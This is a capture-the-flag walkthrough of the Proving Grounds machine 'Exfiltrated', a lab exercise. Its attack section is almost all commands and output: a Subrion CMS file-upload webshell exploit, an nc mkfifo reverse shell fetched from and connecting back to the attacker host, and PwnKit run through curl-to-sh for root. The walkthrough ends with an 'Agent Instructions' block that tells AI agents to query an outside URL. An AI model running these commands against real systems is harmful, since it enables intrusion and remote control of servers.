# Exfiltrated
## Intro
## Initial Foothold
```
# Nmap 7.94SVN scan initiated Fri Mar 29 10:17:34 2024 as: nmap -sC -sV -vv -oA nmap/initial exfiltrated.pg
Nmap scan report for exfiltrated.pg (192.168.172.163)
Host is up, received echo-reply ttl 61 (0.041s latency).
Scanned at 2024-03-29 10:17:34 CDT for 9s
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDH6PH1/ST7TUJ4Mp/l4c7G+TM07YbX7YIsnHzq1TRpvtiBh8MQuFkL1SWW9+za+h6ZraqoZ0ewwkH+0la436t9Q+2H/Nh4CntJOrRbpLJKg4hChjgCHd5KiLCOKHhXPs/FA3mm0Zkzw1tVJLPR6RTbIkkbQiV2Zk3u8oamV5srWIJeYUY5O2XXmTnKENfrPXeHup1+3wBOkTO4Mu17wBSw6yvXyj+lleKjQ6Hnje7KozW5q4U6ijd3LmvHE34UHq/qUbCUbiwY06N2Mj0NQiZqWW8z48eTzGsuh6u1SfGIDnCCq3sWm37Y5LIUvqAFyIEJZVsC/UyrJDPBE+YIODNbN2QLD9JeBr8P4n1rkMaXbsHGywFtutdSrBZwYuRuB2W0GjIEWD/J7lxKIJ9UxRq0UxWWkZ8s3SNqUq2enfPwQt399nigtUerccskdyUD0oRKqVnhZCjEYfX3qOnlAqejr3Lpm8nA31pp6lrKNAmQEjdSO8Jxk04OR2JBxcfVNfs=
| 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI0EdIHR7NOReMM0G7C8zxbLgwB3ump+nb2D3Pe3tXqp/6jNJ/GbU2e4Ab44njMKHJbm/PzrtYzojMjGDuBlQCg=
| 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDCc0saExmeDXtqm5FS+D5RnDke8aJEvFq3DJIr0KZML
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 09BDDB30D6AE11E854BFF82ED638542B
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://exfiltrated.offsec/
| http-robots.txt: 7 disallowed entries
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/
|_/updates/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 29 10:17:43 2024 -- 1 IP address (1 host up) scanned in 8.90 seconds
```
Open Ports
* 22/tcp - OpenSSH 8.2p1 Ubuntu
* 80/tcp - Apache httpd 2.4.41 Ubuntu
80/tcp is running Subrion CMS v4.2.1
Subrion v4.2.1 exploits
```
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting | php/webapps/47469.txt
Subrion CMS 4.2.1 - 'avatar[path]' XSS | php/webapps/49346.txt
Subrion CMS 4.2.1 - Arbitrary File Upload | php/webapps/49876.py
Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin) | php/webapps/50737.txt
Subrion CMS 4.2.1 - Cross-Site Scripting | php/webapps/45150.txt
Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS) | php/webapps/51110.txt
---------------------------------------------------------------------------------------------------------------- ---------------------------------
```
Exploit Subrion - Arbitrary File Upload of webshell
```
┌──(joe㉿kali)-[~/hax/pg/exfiltrated]
└─$ python3 49876.py -u http://exfiltrated.offsec/panel/ -l admin -p admin
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422
[+] Trying to connect to: http://exfiltrated.offsec/panel/
[+] Success!
[+] Got CSRF token: EKdNpVdsAO86ja8qWK4lLk86aPWmAYMUMstEDunx
[+] Trying to log in...
[+] Login Successful!
[+] Generating random name for Webshell...
[+] Generated webshell name: fjzvjyelbvdklzs
[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://exfiltrated.offsec/panel/uploads/fjzvjyelbvdklzs.phar
$ whoami
www-data
```
Download and run linpeas, copy to www folder to make available for download to kali
```
$ wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -O /tmp/linpeas.sh
$ ls /tmp/
linpeas.sh
$ sh /tmp/linpeas.sh > /tmp/linpeas-output.txt
$ cp /tmp/linpeas-output.txt /var/www/html/subrion/
```
Get Reverse Shell
```
$ which nc
/usr/bin/nc
$ wget http://192.168.45.197:8000/ncrev.sh -O /tmp/ncrev.sh
$ sh /tmp/ncrev.sh
```
Contents of reverse shell script
```
┌──(joe㉿kali)-[~/hax/pg/exfiltrated]
└─$ cat ncrev.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.197 80 >/tmp/f
```
Listener catching shell
```
┌──(joe㉿kali)-[~/hax/pg/exfiltrated]
└─$ sudo nc -lvnp 80
[sudo] password for joe:
listening on [any] 80 ...
connect to [192.168.45.197] from (UNKNOWN) [192.168.172.163] 47826
sh: 0: can't access tty; job control turned off
$ whoami
www-data
```
## Privilege Escalation
Linpeas output suggesting using PwnKit (CVE-2021-4034)
Running PwnKit [exploit](https://github.com/ly4k/PwnKit) to escalate to root
```
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@exfiltrated:/var/www/html/subrion/uploads$ sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
<.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
root@exfiltrated:/var/www/html/subrion/uploads# whoami
whoami
root
root@exfiltrated:/var/www/html/subrion/uploads# cat /root/proof.txt
cat /root/proof.txt
0d8a7229bdcfd3cf3bd4d86216f5e931
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://walkthroughs.cyanidesecurity.com/proving-grounds/exfiltrated.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.